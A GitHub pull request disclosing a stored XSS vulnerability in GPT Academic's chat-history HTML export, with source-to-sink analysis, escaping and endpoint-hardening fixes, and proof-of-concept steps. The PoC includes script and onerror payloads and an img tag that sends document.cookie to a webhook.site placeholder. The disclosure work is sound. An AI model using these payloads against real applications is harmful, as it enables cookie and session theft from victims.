Fixed XSS in unescaped chat input #2196

Open · wants to merge 1 commit into master

Conversation

geckosecurity

Version: Latest

A stored XSS vulnerability exists in the conversation history feature of GPT Academic. The feature lets users save chat conversations as HTML files, but it fails to sanitize user input before storing it in those files. When the HTML files are later accessed through the application's /file endpoint, any malicious JavaScript embedded in the conversation executes in the victim's browser.

The vulnerability occurs in the write_chat_to_file() function in crazy_functions/Conversation_To_File.py, where user-controlled content from both questions and answers is interpolated directly into HTML templates without any sanitization or escaping. The result is a persistent XSS: an attacker crafts malicious input, saves it as a conversation file, and shares the resulting URL with victims.

Source-Sink Analysis

  1. Source: User-controlled input in the chat interface

    • Input is received in the chatbot parameter of write_chat_to_file()
    • Both question and answer fields can contain malicious content
  2. Transformation: Unsanitized processing in write_chat_to_file()

    # From crazy_functions/Conversation_To_File.py
    for i, contents in enumerate(chatbot):
        question, answer = contents[0], contents[1]
        if question is None: question = ""
        try: question = str(question)
        except: question = ""
        if answer is None: answer = ""
        try: answer = str(answer)
        except: answer = ""
        # Sink: raw user input is interpolated into the HTML template
        CHAT_PREVIEW_BUF += qa_from.format(QUESTION=question, ANSWER=answer)
    • No input validation or sanitization is performed
    • Raw user input is inserted directly into the HTML via string formatting (a hedged fix sketch follows this list)
  3. Storage: HTML file creation

    with open(fp, 'w', encoding='utf8') as f:
        # CHAT_PREVIEW_BUF still contains raw, unescaped user input
        html_content = form.format(CHAT_PREVIEW=CHAT_PREVIEW_BUF, HISTORY_PREVIEW=HISTORY_PREVIEW_BUF, CSS=advanced_css)
        f.write(html_content)
    • Malicious HTML/JavaScript is written to a file with a predictable naming pattern
  4. File Access: The /file endpoint in shared_utils/fastapi_server.py serves these HTML files (see the serving-layer sketch after this list)

    @gradio_app.get("/file={path_or_url:path}", dependencies=dependencies)
    async def file(path_or_url: str, request: fastapi.Request):
        # ... (authorization checks)
        return await endpoint(path_or_url, request)
  5. Sink: Browser execution

    • When the HTML file is accessed, any embedded JavaScript executes in the victim's browser context
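
A minimal sketch of the write-time fix referenced in step 2, using Python's standard html.escape() on both user-controlled fields before they reach the template. The surrounding names (chatbot, qa_from, CHAT_PREVIEW_BUF) come from the code quoted above; the escaping is the proposed change, not the project's current behavior:

    import html

    # Proposed hardening of the loop in write_chat_to_file():
    # escape the user-controlled fields so <, >, &, and quotes are
    # rendered as text rather than parsed as markup.
    for i, contents in enumerate(chatbot):
        question, answer = contents[0], contents[1]
        question = "" if question is None else str(question)
        answer = "" if answer is None else str(answer)
        CHAT_PREVIEW_BUF += qa_from.format(
            QUESTION=html.escape(question, quote=True),
            ANSWER=html.escape(answer, quote=True),
        )

With this change, the payloads below reach the saved file as inert text (e.g. &lt;script&gt;...) instead of executable markup.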
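Independently of the write-time fix, the /file route shown in step 4 can be hardened as defense in depth. A hedged sketch, assuming a plain FastAPI app (the real route is registered on gradio_app with authorization dependencies, elided here): serving saved .html archives as plain-text attachments stops the browser from executing embedded scripts even if an unsanitized file slips through:

    import fastapi
    from fastapi.responses import FileResponse

    app = fastapi.FastAPI()

    @app.get("/file={path_or_url:path}")
    async def file(path_or_url: str, request: fastapi.Request):
        # ... (authorization and path checks as in shared_utils/fastapi_server.py)
        if path_or_url.endswith(".html"):
            # Force a download instead of in-browser rendering
            return FileResponse(
                path_or_url,
                media_type="text/plain",
                headers={"Content-Disposition": "attachment"},
            )
        return FileResponse(path_or_url)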

Proof of Concept

XSS Payload 1:

  1. In the input box, enter the following XSS payload:
    <script>alert("Stored XSS Vulnerability in Conversation History")</script>
    
  2. Submit the payload by clicking the "提交" (Submit) button
  3. Click the "保存当前的对话" (Save current conversation) button
  4. Note the filename (e.g., "GPT-Academic对话存档2023-XX-XX-XX-XX-XX.html")
  5. Access the stored HTML file via:
    http://localhost:22303/file=gpt_log/default_user/chat_history/GPT-Academic对话存档2023-XX-XX-XX-XX-XX.html
    
  6. When the file loads, the JavaScript alert will execute, confirming the vulnerability

XSS Payload 2:

  1. In the chat input box, enter:
    Test Text <img src=x onerror="alert('XSS with cookie: ' + document.cookie)">
    
  2. Follow the same steps as above to save and access the conversation file
  3. The JavaScript in the onerror attribute executes when the image fails to load

XSS Payload 3:

To demonstrate the potential for data theft, use a payload that makes a request to an external server:

<img src="https://webhook.site/YOUR-UNIQUE-ID?cookie="+document.cookie style="display:none">

Replace YOUR-UNIQUE-ID with a unique identifier from webhook.site or a similar service.
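
For a scriptable check of any of the payloads above, the sketch below fetches the saved archive through the /file endpoint and reports whether the markup survived unescaped. BASE_URL and ARCHIVE_NAME are placeholders to fill in from the save step; this helper is illustrative and not part of the project:

    import requests

    BASE_URL = "http://localhost:22303"
    # Replace with the actual timestamped filename noted after saving
    ARCHIVE_NAME = "GPT-Academic对话存档2023-XX-XX-XX-XX-XX.html"

    resp = requests.get(f"{BASE_URL}/file=gpt_log/default_user/chat_history/{ARCHIVE_NAME}")
    resp.raise_for_status()

    # Raw tags in the response body mean the input was stored without escaping
    if "<script>" in resp.text or "onerror=" in resp.text:
        print("VULNERABLE: payload stored unescaped in the conversation archive")
    else:
        print("Payload appears escaped or absent")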

Impact

An attacker can:

  • Execute arbitrary JavaScript in victims' browsers
  • Steal sensitive cookies and authentication tokens
  • Perform unauthorized actions with victims' privileges
  • Access sensitive browser data such as localStorage contents
